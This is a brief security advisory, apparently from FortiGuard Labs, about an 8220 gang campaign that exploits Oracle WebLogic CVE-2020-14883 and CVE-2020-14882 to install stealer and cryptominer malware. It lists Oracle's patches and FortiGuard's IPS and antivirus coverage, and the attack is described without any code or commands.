LR pixel

What is the Attack?

An attack campaign led by the 8220 gang has been seen leveraging a 3-year old Oracle WebLogic Server vulnerabilities (CVE-2020-14883 which is commonly chained with CVE-2020-14882) to distribute malware. The attackers are able to download maliciously crafted XML files, allowing remote code execution, and finally deploying stealer and cryptominer malware such as AgentTesla, rhajk, nasqa. The high IPS detection rate suggests that the exploitation is at large.

What is the Vendor Solution?

Oracle has released relevant updates since October 2020 at https://www.oracle.com/security-alerts/cpuoct2020traditional.html.

What FortiGuard Coverage is available?

FortiGuard Labs has an IPS signature created in Nov 2020, “Oracle.WebLogic.Fusion.Middleware.Authentication.Bypass” (with default action is set to “block”) in place for CVE-2020-14883, CVE-2020-14882 and has released antivirus signatures for the known and related malware to this campaign.

FortiGuard Labs recommends companies to scan their environment, find the versions of vulnerable software applications in use, and develop an upgrade plan for them and always follow best practices.